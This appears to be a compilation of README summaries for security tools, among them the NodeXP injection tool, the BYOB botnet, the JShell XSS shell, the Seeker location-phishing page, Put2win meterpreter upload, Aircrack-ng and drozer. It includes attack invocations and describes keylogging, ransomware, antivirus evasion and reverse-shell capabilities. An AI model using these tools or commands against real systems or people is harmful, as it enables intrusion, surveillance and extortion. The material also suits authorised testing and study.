SubScraper uses DNS brute force, Google & Bing scraping, and Virus Total to enumerate subdomains without an API. Written in Python3, SubScraper performs HTTP(S) requests and DNS “A” record lookups during the enumeration process to validate discovered subdomains. This provides further information to help prioritize targets and aid in potential next steps. Post-Enumeration, “CNAME” lookups are displayed to identify subdomain takeover opportunities. 


Usage

python3 subscraper.py example.com
python3 subscraper.py -t 5 -o csv example.com

Options

  -s              Only use internet to find subdomains
-b Only use DNS brute forcing to find subdomains
-o OUTFILE Define output file type: csv/txt (Default: None)
-t MAX_THREADS Max threads (Default: 10)
-w SUBLIST Custom subdomain wordlist

NodeXP is an intergrated tool, written in Python 2.7, capable of detecting possible vulnerabilities on Node.js services as well as exploiting them in an automated way, based on S(erver)S(ide)J(avascript)I(njection) attack!


Getting Started – Installation & Usage
Download NodeXP by cloning the Git repository:

git clone https://github.com/esmog/nodexp

To get a list of all options run:

python2.7 nodexp -h

Examples for POST and GET cases accordingly:

python2.7 nodexp.py --url="http://nodegoat.herokuapp.com/contributions" --pdata="preTax=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA"
python2.7 nodexp.py --url="http://nodegoat.herokuapp.com/contributions" --pdata="preTax=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA" --tech=blind

python2.7 nodexp.py --url="http://192.168.64.30/?name=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA"
python2.7 nodexp.py --url="http://192.168.64.30/?name=[INJECT_HERE]" -c="connect.sid=s:i6fKU7kSLPX1l00WkOxDmEfncptcZP1v.fy9whjYW0fGAvbavzYSBz1C2ZhheDuQ1SU5qpgVzbTA" --tech=blind

Disclaimer
The tool’s purpose is strictly academic and was developed in order to conduct my master's thesis. It could also be helpful during the process of a penetration test on Node.js services. Any other malicious or illegal usage of the tool is strongly not recommended and is clearly not a part of the purpose of this research.

Prerequisites

  • Python 2.7
  • Metasploit Framework
  • msfvenom
  • Kali Linux (or any other Linux distro with Metasploit Framework installed)

NodeXP Testbeds

  • Download and run the Node.js files for both GET and POST cases from here
  • Visit Nodegoat or install Nodegoat to your local machine!

Built With

  • Python 2.7

Versioning
NodeXP – Version 1.0.0

Authors

  • Dimitris Antonaropoulosesmog

An Open-Source Pre and Post Callback-Based Framework for macOS Kernel Monitoring.
What is Kemon?
An open-source Pre and Post callback-based framework for macOS kernel monitoring. With the power of Kemon, we can easily implement LPC communication monitoring, MAC policy filtering, kernel driver firewall, etc. In general, from an attacker's perspective, this framework can help achieve more powerful Rootkit. From the perspective of defense, Kemon can help construct more granular monitoring capabilities. I also implemented a kernel fuzzer through this framework, which helped me find many vulnerabilities, such as: CVE-2017-7155, CVE-2017-7163, CVE-2017-13883, etc.


Supported Features
Kemon's features include:

  • file operation monitoring
  • process creation monitoring
  • dynamic library and kernel extension monitoring
  • network traffic monitoring
  • Mandatory Access Control (MAC) policy monitoring, etc.

In addition, Kemon project can also extend the Pre and Post callback-based monitoring interfaces for any macOS kernel function.

Getting Started

How to build the Kemon driver
Please use Xcode project or makefile to build the Kemon kext driver

How to use the Kemon driver

  • Please turn off macOS System Integrity Protection (SIP) check if you don't have a valid kernel certificate
  • Use the command “sudo chown -R root:wheel kemon.kext” to change the owner of the Kemon driver
  • Use the command “sudo kextload kemon.kext” to install the Kemon driver
  • Use the command “sudo kextunload kemon.kext” to uninstall the Kemon driver

BYOB (Build Your Own Botnet)

Disclaimer: This project should be used for authorized testing or educational purposes only.
BYOB is an open-source project that provides a framework for security researchers and developers to build and operate a basic botnet to deepen their understanding of the sophisticated malware that infects millions of devices every year and spawns modern botnets, in order to improve their ability to develop counter-measures against these threats.
It is designed to allow developers to easily implement their own code and add cool new features without having to write a RAT (Remote Administration Tool) or a C2 (Command & Control server) from scratch.
The RAT's key feature is that arbitrary code/files can be remotely loaded into memory from the C2 and executed on the target machine without writing anything to the disk.


Server
usage: server.py [-h] [-v] [--host HOST] [--port PORT] [--database DATABASE]
Command & control server with persistent database and console

  • Console-Based User-Interface: streamlined console interface for controlling client host machines remotely via reverse TCP shells which provide direct terminal access to the client host machines
  • Persistent SQLite Database: lightweight database that stores identifying information about client host machines, allowing reverse TCP shell sessions to persist through disconnections of arbitrary duration and enabling long-term reconnaissance
  • Client-Server Architecture: all python packages/modules installed locally are automatically made available for clients to remotely import without writing them to the disk of the target machines, allowing clients to use modules which require packages not installed on the target machines

Client
usage: client.py [-h] [-v] [--name NAME] [--icon ICON] [--pastebin API] [--encrypt] [--obfuscate] [--compress] [--compile] host port [module [module ...]]
Generate fully-undetectable clients with staged payloads, remote imports, and unlimited modules

  • Remote Imports: remotely import third-party packages from the server without writing them to the disk or downloading/installing them
  • Nothing Written To The Disk: clients never write anything to the disk – not even temporary files (zero IO system calls are made) because remote imports allow arbitrary code to be dynamically loaded into memory and directly imported into the currently running process
  • Zero Dependencies (Not Even Python Itself): client runs with just the python standard library, remotely imports any non-standard packages/modules from the server, and can be compiled with a standalone python interpreter into a portable binary executable formatted for any platform/architecture, allowing it to run on anything, even when Python itself is missing on the target host
  • Add New Features With Just 1 Click: any python script, module, or package you to copy to the ./byob/modules/ directory automatically becomes remotely importable & directly usable by every client while your command & control server is running
  • Write Your Own Modules: a basic module template is provided in ./byob/modules/ directory to make writing your own modules a straight-forward, hassle-free process
  • Run Unlimited Modules Without Bloating File Size: use remote imports to add unlimited features without adding a single byte to the client's file size
  • Fully Updatable: each client will periodically check the server for new content available for remote import, and will dynamically update its in-memory resources if anything has been added/removed
  • Platform Independent: everything is written in Python (a platform-agnostic language) and the clients generated can optionally be compiled into portable executable (Windows) or bundled into an standalone application (macOS)
  • Bypass Firewalls: clients connect to the command & control server via reverse TCP connections, which will bypass most firewalls because the default filter configurations primarily block incoming connections
  • Counter-Measure Against Antivirus: avoids being analyzed by antivirus by blocking processes with names of known antivirus products from spawning
  • Encrypt Payloads To Prevent Analysis: the main client payload is encrypted with a random 256-bit key which exists solely in the payload stager which is generated along with it
  • Prevent Reverse-Engineering: by default, clients will abort execution if a virtual machine or sandbox is detected

Modules
Post-exploitation modules that are remotely importable by clients

  1. Keylogger (byob.modules.keylogger): logs the user’s keystrokes & the window name entered
  2. Screenshot (byob.modules.screenshot): take a screenshot of current user’s desktop
  3. Webcam (byob.modules.webcam): view a live stream or capture image/video from the webcam
  4. Ransom (byob.modules.ransom): encrypt files & generate random BTC wallet for ransom payment
  5. Outlook (byob.modules.outlook): read/search/upload emails from the local Outlook client
  6. Packet Sniffer (byob.modules.packetsniffer): run a packet sniffer on the host network & upload .pcap file
  7. Persistence (byob.modules.persistence): establish persistence on the host machine using 5 different methods
  8. Phone (byob.modules.phone): read/search/upload text messages from the client smartphone
  9. Escalate Privileges (byob.modules.escalate): attempt UAC bypass to gain unauthorized administrator privileges
  10. Port Scanner (byob.modules.portscanner): scan the local network for other online devices & open ports
  11. Process Control (byob.modules.process): list/search/kill/monitor currently running processes on the host

Core
Core framework modules used by the generator and the server

  1. Utilities (byob.core.util): miscellaneous utility functions that are used by many modules
  2. Security (byob.core.security): Diffie-Hellman IKE & 3 encryption modes (AES-256-OCB, AES-256-CBC, XOR-128)
  3. Loaders (byob.core.loaders): remotely import any package/module/scripts from the server
  4. Payloads (byob.core.payloads): reverse TCP shell designed to remotely import dependencies, packages & modules
  5. Stagers (byob.core.stagers): generate unique payload stagers to prevent analysis & detection
  6. Generators (byob.core.generators): functions which all dynamically generate code for the client generator
  7. Database (byob.core.database): handles interaction between command & control server and the SQLite database

Contact
Website: https://malwared.com
Email: security@malwared.com
Twitterhttps://twitter.com/malwaredllc

Aircrack-ng is a complete suite of tools to assess WiFi network security.

It focuses on different areas of WiFi security:
  • Monitoring: Packet capture and export of data to text files for further processing by third party tools.
  • Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
  • Testing: Checking WiFi cards and driver capabilities (capture and injection).
  • Cracking: WEP and WPA PSK (WPA 1 and 2).
All tools are command line which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily Linux but also Windows, OS X, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.

Aircrack-ng 1.4

It focuses a lot on code quality and adds a few visible features:

  • PMKID cracking
  • Crack 802.11w capture files
  • Speed and memory usage improvement when loading (large) files with Aircrack-ng and Airdecap-ng
  • Packages for Linux distributions and Windows
  • Fix building on various platforms
  • Improved and tweaked our CI/CD processes
  • Using new CI/CD tools for our buildbots and packaging, PyDeployer
  • Almost doubled the amount of tests

PMKID

On routers with 802.11i/p/r, the AP can cache an “ID” for the connection so roaming clients don't have to waste frames reauthenticating and just use the PMKID, which helps decrease a bit the latency (from 6 frames to only 2).

Calculation is of the PMKID is done this way:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | BSSID | STA MAC)

A big advantage here is that this PMKID is present in the first EAPoL frame of the 4-way handshake.

A few caveats about this attack:

  • Sometimes APs send empty PMKID
  • It doesn't work on WPA/WPA2 Enterprise networks

When loading a PCAP, Aircrack-ng will detect if it contains a PMKID. In the following screenshot, it is present for the network ogogo, notice the “with PMKID” on the same line:

When selecting the network, it will use it as if it were a regular PCAP with a handshake (and thus the wordlist requirement applies).

If you'd like to test, two capture files with PMKID are available this test files:

More details about the attack itself can be found in this post.

More info: https://aircrack-ng.blogspot.com/2018/09/aircrack-ng-14.html

Install

git clone https://github.com/aircrack-ng/aircrack-ng
cd aircrack-ng
./autogen.sh
make
make install
cd src/
aircrack-ng

JShell – Get a JavaScript shell with XSS.

Usages
Run shell.py
and JShell will automatically try to detect your IP address, default LPORT is 33.

As you can see the payload has been generated and now all you have to do is to deliver this payload to the victim.

As soon as you do that, you will get a JS shell over netcat where you can execute your JavaScript code in victim's browser as soon as the injected page is open.
Here's a screenshot:

Credits, Disclaimer & License
This script uses the method demostrated by Rodolfo Assis

Concept behind Seeker is simple, just like we host phishing pages to get credentials why not host a fake page that requests your loction just like many popular location based websites.
Seeker Hosts a fake website on Apache Server and uses Ngrok, website asks for Location Permission and if the user allows it, we can get :
  • Longitude
  • Latitude
  • Accuracy
  • Altitude – Not always available
  • Direction – Only available if user is moving
  • Speed – Only available if user is moving


Along with Location Information we also get Device Information without any permissions :

  • Operating System
  • Platform
  • Number of CPU Cores
  • Amount of RAM – Approximate Results
  • Screen Resolution
  • GPU information
  • Browser Name and Version
  • Public IP Address

This tool is purely a Proof of Concept and is for Educational Purposes Only, Seeker shows what data a malicious website can gather about you and your devices and why you should not click on random links and allow critical permissions such as Location etc.

  • Other tools and services offer IP Geolocation which is not very accurate and does not give location of user.
  • Generally if a user accepts location permsission, Accuracy of the information recieved is accurate to approximately 30 meters.

Note : On iPhone due to some reason location accuracy is approximately 65 meters.

Tested On :

  • Kali Linux 2018.2
  • Ubuntu 18.04
  • Arch Linux based Distro
  • Termux
  • Kali Linux (WSL)

Installation

Ubuntu/Kali Linux

git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 install.sh
./install.sh

# After Installation just type seeker in console

# OR using Docker

# Install docker

curl -fsSL https://get.docker.com -o get-docker.sh
sh get-docker.sh

# Build Seeker
cd seeker/
docker build -t seeker .

# Launch seeker
docker run -t --rm seeker

Arch Linux Based Distro

# Install docker

pacman -Syy
pacman -S docker
systemctl start docker.service

# Build Seeker
cd seeker/
docker build -t seeker .

# Launch seeker
docker run -t --rm seeker

Termux

cd seeker/termux
chmod 777 install.sh
./install.sh

# After Installation just type seeker in console

If you are unable to get ngrok url that means ngrok is unable to resolve dns, switch to Mobile Data instead of WiFi and it should work, this is a problem with ngrok.

Demo
Youtube – https://www.youtube.com/watch?v=ggUGPq4cjSM

Script to automatize shell upload by PUT HTTP method to get meterpreter.

Dependencies
It's necessary to have installed nmap and msfvenom tools for a correct operation

Installation
git clone https://github.com/sysdevploit/put2win

Usage
./Put2win.sh -h
This script automatize shell upload by PUT HTTP method to get meterpreter.
Usage: ./Put2win.sh -t TARGET [-p PORT] -u URL_PATH -l LHOST
Examples:

  • ./Put2win.sh -t 192.168.1.80 -u /uploads -l 192.168.1.10
  • ./Put2win.sh -t 192.168.1.80 -p 443 -u /uploads -l 192.168.1.10

Contact
Telegram: @devploit
Twitter: https://www.twitter.com/devploit

A UDP Tunnel which tunnels UDP via FakeTCP/UDP/ICMP Traffic by using Raw Socket, helps you Bypass UDP FireWalls (or Unstable UDP Environment). Its Encrypted, Anti-Replay and Multiplexed.It also acts as a Connection Stabilizer.

Support Platforms
A Linux host (including desktop Linux, Android phone/tablet, OpenWRT router, or Raspberry PI) with root access.
For Winodws/MacOS, a virtual image with udp2raw pre-installed has been released, you can load it with Vmware/VirtualBox.The virtual image has been set to auto obtain ip, udp2raw can be run immediately after boot finished(make sure network mode of virtual machine has been set to bridged)(only udp2raw has to be run under a virtual machine, all other programs run under Windows/MacOS as usual).
Features
Send / Receive UDP Packet with fake-tcp/icmp headers
Fake-tcp/icmp headers help you bypass UDP blocking, UDP QOS or improper UDP NAT behavior on some ISPs. Raw packets with UDP headers are also supported.In UDP header mode, it behaves just like a normal UDP tunnel, and you can just make use of the other features.
Simulate TCP Handshake
Simulates the 3-way handshake, along with seq and ack_seq. TCP options MSS, sackOk, TS, TS_ack, wscale are also simulated. Real-time delivery guaranteed, no TCP over TCP problem when using OpenVPN.
Encryption, Anti-Replay, No MITM
  • Encrypt your traffic with AES-128-CBC.
  • Protect data integrity by MD5 or CRC32.
  • Defense replay attack with an anti-replay window, similar to IPSec and OpenVPN.
  • Authenticate mutually, no MITM attacks.
Failure Detection & Stabilization (Connection Recovery)
Connection failures are detected by heartbeats. If timed-out, the client will automatically change port number and reconnect. If reconnection is successful, the previous connection will be recovered, and all existing UDP conversations will stay valid.
For example, if you use UDP2RAW + OpenVPN, OpenVPN won't lose connection after any reconnect, even if the network cable is re-plugged or the WiFi access point is changed.
Other Features
  • Multiplexing One client can handle multiple UDP connections, all of which share the same raw connection.
  • Multiple Clients One server can have multiple clients.
  • NAT Support All of the 3 modes work in NAT environments.
  • OpenVZ Support Tested on BandwagonHost.
  • OpenWRT Support No dependencies, easy to build. Binary for ar71xx are included in release.

Keywords
UDP QoS Bypass UDP Blocking Bypass OpenVPN TCP over TCP problem OpenVPN over ICMP UDP to ICMP tunnel UDP to TCP tunnel UDP over ICMP UDP over TCP

Getting Started

Installing
Download binary release from https://github.com/wangyu-/udp2raw-tunnel/releases

Running
Assume your UDP is blocked or being QOS-ed or just poorly supported. Assume your server ip is 44.55.66.77, you have a service listening on udp port 7777.

# Run at server side:
./udp2raw_amd64 -s -l0.0.0.0:4096 -r 127.0.0.1:7777 -a -k "passwd" --raw-mode faketcp

# Run at client side
./udp2raw_amd64 -c -l0.0.0.0:3333 -r44.55.66.77:4096 -a -k "passwd" --raw-mode faketcp

Server Output:

Client Output:

Now, an encrypted raw tunnel has been established between client and server through TCP port 4096. Connecting to UDP port 3333 at the client side is equivalent to connecting to port 7777 at the server side. No UDP traffic will be exposed.

Note
to run on Android, see Android_Guide

Advanced Topic

Usage

udp2raw-tunnel
version: Aug 18 2017 00:29:11
repository: https://github.com/wangyu-/udp2raw-tunnel

usage:
run as client : ./this_program -c -l local_listen_ip:local_port -r server_ip:server_port [options]
run as server : ./this_program -s -l server_listen_ip:server_port -r remote_ip:remote_port [options]

common options, these options must be same on both side:
--raw-mode avaliable values:faketcp(default), udp, icmp
-k, --key password to gen symetric key, default:"secret key"
--cipher-mode avaliable values:aes128cbc(default), xor, none
--auth-mode avaliable values:md5(default), crc32, simple, none
-a, --auto-rule auto add (and delete) iptables rule
-g, --gen-rule generate iptables rule then exit
--disable-anti-replay disable anti-replay, not suggested
client options:
--source-ip force source-ip for raw socket
--source-port force source-port for raw socket, tcp/udp only
this option disables port changing while re-connecting
other options:
--log-level 0:never 1:fatal 2:error 3:warn
4:info (default) 5:debug 6:trace
--log-position enable file name, function name, line number in log
--disable-color disable log color
--disable-bpf disable the kernel space filter, most time its not necessary
unless you suspect there is a bug
--sock-buf buf size for socket, >=10 and <=10240, unit:kbyte, default:1024
--seqmode seq increase mode for faketcp:
0:dont increase
1:increase every packet
2:increase randomly, about every 3 packets (default)
--lower-level send packet at OSI level 2, format:'if_name#dest_mac_adress'
ie:'eth0#00:23:45:67:89:b9'.Beta.
-h, --help print this help message

IPTABLES rule
This program sends packets via raw socket. In FakeTCP mode, Linux kernel TCP packet processing has to be blocked by a iptables rule on both sides, otherwise the kernel will automatically send RST for an unrecongized TCP packet and you will sustain from stability / peformance problems. You can use -a option to let the program automatically add / delete iptables rule on start / exit. You can also use the -g option to generate iptables rule and add it manually.

cipher-mode and auth-mode
It is suggested to use aes128cbc + md5 to obtain maximum security. If you want to run the program on a router, you can try xor + simple, which can fool packet inspection by firewalls the most of time, but it cannot protect you from serious attacks. Mode none is only for debugging purpose. It is not recommended to set the cipher-mode or auth-mode to none.

seq-mode
The FakeTCP mode does not behave 100% like a real tcp connection. ISPs may be able to distinguish the simulated tcp traffic from the real TCP traffic (though it's costly). seq-mode can help you change the seq increase behavior slightly. If you experience connection problems, try to change the value.

Peformance Test

Test method:
iperf3 TCP via OpenVPN + udp2raw (iperf3 UDP mode is not used because of a bug mentioned in this issue: https://github.com/esnet/iperf/issues/296 . Instead, we package the TCP traffic into UDP by OpenVPN to test the performance. Read Application for details.

iperf3 command:

iperf3 -c 10.222.2.1 -P40 
iperf3 -c 10.222.2.1 -P40 -R

Environments

  • Client Vultr $2.5/monthly plan (single core 2.4GHz cpu, 512MB RAM, Tokyo, Japan)
  • Server BandwagonHost $3.99/annually plan (single core 2.0GHz cpu, 128MB RAM, Los Angeles, USA)

Test1
raw_mode: faketcp cipher_mode: xor  auth_mode: simple

(reverse speed was simliar and not uploaded)

Test2
raw_mode: faketcp cipher_mode: aes128cbc  auth_mode: md5

(reverse speed was simliar and not uploaded)

Application

tunneling any traffic via raw traffic by using udp2raw +openvpn

  1. bypasses UDP block/UDP QOS
  2. no TCP ovr tcp problem (tcp over tcp problem http://sites.inka.de/bigred/devel/tcp-tcp.html , https://community.openvpn.net/openvpn/ticket/2 )
  3. openvpn over icmp also becomes a choice

more details at openvpn+udp2raw_guide

speed-up tcp connection via raw traffic by using udp2raw+kcptun
kcptun is a tcp connection speed-up program, it speeds-up tcp connection by using kcp protocol on-top of udp.by using udp2raw, you can use kcptun while udp is QoSed or blocked. (kcptun, https://github.com/xtaci/kcptun)

speed-up tcp connection via raw traffic by using udp2raw+finalspeed
finalspeed is a tcp connection speed-up program similiar to kcptun, it speeds-up tcp connection by using kcp protocol on-top of udp or tcp.but its tcp mode doesnt support openvz, you can bypass this problem if you use udp2raw+finalspeed together, and icmp mode also becomes avaliable.

Other

Easier installation on ArchLinux

yaourt -S udp2raw-tunnel # or
pacaur -S udp2raw-tunnel

drozer (formerly Mercury) is the leading security testing framework for Android.
drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
drozer provides tools to help you use, share and understand public Android exploits. It helps you to deploy a drozer Agent to a device through exploitation or social engineering. Using weasel (MWR's advanced exploitation payload) drozer is able to maximise the permissions available to it by installing a full agent, injecting a limited agent into a running process, or connecting a reverse shell to act as a Remote Access Tool (RAT).
drozer is open source software, maintained by MWR InfoSecurity, and can be downloaded from: mwr.to/drozer


Prerequisites

  1. Python2.7

Note: On Windows please ensure that the path to the Python installation and the Scripts folder under the Python installation are added to the PATH environment variable.

  1. Protobuf 2.6 or greater
  2. Pyopenssl 16.2 or greater
  3. Twisted 10.2 or greater
  4. Java Development Kit 1.7

Note: On Windows please ensure that the path to javac.exe is added to the PATH environment variable.

  1. Android Debug Bridge

Installing

Building Python wheel

git clone https://github.com/mwrlabs/drozer/
cd drozer
python setup.py bdist_wheel

Installing Python wheel

sudo pip install drozer-2.x.x-py2-none-any.whl

Building for Debian/Ubuntu/Mint

git clone https://github.com/mwrlabs/drozer/
cd drozer
make deb

Installing .deb (Debian/Ubuntu/Mint)

sudo dpkg -i drozer-2.x.x.deb

Building for Redhat/Fedora/CentOS

git clone https://github.com/mwrlabs/drozer/
cd drozer
make rpm

Installing .rpm (Redhat/Fedora/CentOS)

sudo rpm -I drozer-2.x.x-1.noarch.rpm

Building for Windows
NOTE: Windows Defender and other Antivirus software will flag drozer as malware (an exploitation tool without exploit code wouldn't be much fun!). In order to run drozer you would have to add an exception to Windows Defender and any antivirus software. Alternatively, we recommend running drozer in a Windows/Linux VM.

git clone https://github.com/mwrlabs/drozer/
cd drozer
python.exe setup.py bdist_msi

Installing .msi (Windows)

Run dist/drozer-2.x.x.win-x.msi 

Arch Linux
yaourt -S drozer

Usage

Installing the Agent
Drozer can be installed using Android Debug Bridge (adb).
Download the latest Drozer Agent here.
$ adb install drozer-agent-2.x.x.apk

Starting a Session
You should now have the drozer Console installed on your PC, and the Agent running on your test device. Now, you need to connect the two and you’re ready to start exploring.
We will use the server embedded in the drozer Agent to do this.
If using the Android emulator, you need to set up a suitable port forward so that your PC can connect to a TCP socket opened by the Agent inside the emulator, or on the device. By default, drozer uses port 31415:
$ adb forward tcp:31415 tcp:31415
Now, launch the Agent, select the “Embedded Server” option and tap “Enable” to start the server. You should see a notification that the server has started.
Then, on your PC, connect using the drozer Console:
On Linux:
$ drozer console connect
On Windows:
> drozer.bat console connect
If using a real device, the IP address of the device on the network must be specified:
On Linux:
$ drozer console connect --server 192.168.0.10
On Windows:
> drozer.bat console connect --server 192.168.0.10
You should be presented with a drozer command prompt:

selecting f75640f67144d9a3 (unknown sdk 4.1.1)  
dz>

The prompt confirms the Android ID of the device you have connected to, along with the manufacturer, model and Android software version.
You are now ready to start exploring the device.

Command Reference

Command Description
run Executes a drozer module
list Show a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.
shell Start an interactive Linux shell on the device, in the context of the Agent process.
cd Mounts a particular namespace as the root of session, to avoid having to repeatedly type the full name of a module.
clean Remove temporary files stored by drozer on the Android device.
contributors Displays a list of people who have contributed to the drozer framework and modules in use on your system.
echo Print text to the console.
exit Terminate the drozer session.
help Display help about a particular command or module.
load Load a file containing drozer commands, and execute them in sequence.
module Find and install additional drozer modules from the Internet.
permissions Display a list of the permissions granted to the drozer Agent.
set Store a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.
unset Remove a named variable that drozer passes to any Linux shells that it spawns.

Contacting the Project
drozer is Open Source software, made great by contributions from the community.
For full source code, to report bugs, suggest features and contribute patches please see our Github project:
https://github.com/mwrlabs/drozer
Bug reports, feature requests, comments and questions can be submitted here.
Follow the latest drozer news, follow the project on Twitter:
@mwrdrozer